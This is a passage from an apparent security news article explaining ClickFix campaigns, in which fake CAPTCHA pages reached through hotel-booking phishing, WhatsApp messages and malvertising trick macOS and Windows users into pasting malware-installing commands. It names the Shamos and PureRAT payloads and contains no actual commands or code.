Over the past year, cybercriminals have increasingly adopted a relatively new and sophisticated technique to infect computers with malware, targeting both macOS and Windows users. This method, known as “ClickFix,” exploits users’ trust and bypasses many traditional endpoint security protections, making it a significant threat that many potential victims are still unaware of.
The ClickFix attack typically begins with a seemingly legitimate communication. Commonly, victims receive an email from a hotel where they supposedly have a pending reservation, complete with accurate registration details to lend credibility. In other cases, the initial contact comes via WhatsApp messages, or the victim might encounter a malicious site listed at the top of Google search results after performing a relevant query. These trusted sources help to lower the victim’s guard and increase the likelihood that they will follow the instructions presented on the malicious site.
Once the victim accesses the fraudulent website, they are confronted with a challenge designed to appear harmless or routine—often a CAPTCHA verification or a similar prompt. The website instructs the user to copy a string of text, open a terminal or command prompt window on their computer, paste the copied text, and press Enter. This step is critical in the attack process, as it initiates the download and installation of malware from a server controlled by the scammers.
What makes this technique particularly insidious is how seamlessly it infects the victim’s machine. After the user executes the command, the computer silently connects to the attacker’s server, downloads the malicious payload, and installs it without any clear indication that anything harmful has occurred. Most often, the malware deployed is credential-stealing software, which silently harvests sensitive information such as passwords, banking details, and personal data. Because the infection process bypasses many traditional endpoint protections, including some security mechanisms built into macOS and Windows, victims have little chance of detecting or stopping the attack once the command is entered.
Security researchers have noted the rapid growth and sophistication of ClickFix campaigns. According to a report from CrowdStrike, the method leverages “malvertising” (malicious advertising) and a “one-line installation command” to deliver malware, particularly targeting macOS users. The campaign documented by CrowdStrike involved the distribution of a Mach-O executable—a common type of binary file on macOS—designed to steal information. The attackers also used deceptive websites to drive traffic and maximize the number of victims. Crucially, the one-line command technique allows the malware to bypass macOS’s built-in Gatekeeper security checks, which normally prevent unauthorized software installation.
The primary malware deployed in this macOS campaign is known as Shamos, a credential stealer designed to quietly extract login credentials and other sensitive information. Other malicious payloads included software that turns the infected Mac into part of a botnet, a malicious cryptocurrency wallet, and configuration changes that ensure the malware remains active even after the computer restarts. These capabilities demonstrate the attackers’ intent to maintain long-term access and control over compromised systems.
Windows users are not spared from these attacks. Sekoia, another cybersecurity firm, documented a similar ClickFix campaign targeting Windows devices. Attackers first compromised hotel accounts on popular travel booking platforms like Booking.com. Using the legitimate reservation data stored in these accounts, the attackers contacted individuals with upcoming reservations, building trust by referencing accurate booking details. This strategy increases the likelihood that victims will comply with instructions out of concern for preserving their travel plans.
The malicious site used in this Windows campaign mimics a legitimate CAPTCHA challenge, closely resembling the ones deployed by Cloudflare, a widely used content delivery network. Victims are again asked to copy a piece of text and paste it into the Windows terminal to “prove” they are human. However, this command silently installs malware known as PureRAT, a remote access trojan that gives attackers control over the victim’s machine.
Further complicating detection and defense efforts, some ClickFix campaigns adapt their payloads based on the device accessing the malicious site. Push Security, another cybersecurity organization, reported on a campaign that delivers different malware depending on whether the visitor is using Windows or macOS. Many of these payloads rely on “living off the land” binaries (LOLbins)—legitimate operating system tools and utilities that attackers repurpose to carry out malicious actions. Because LOLbins use native system functionalities and avoid writing suspicious files to disk, endpoint protection software often struggles to detect their activities.
The commands victims are instructed to execute are frequently encoded in base-64 to make them unreadable at a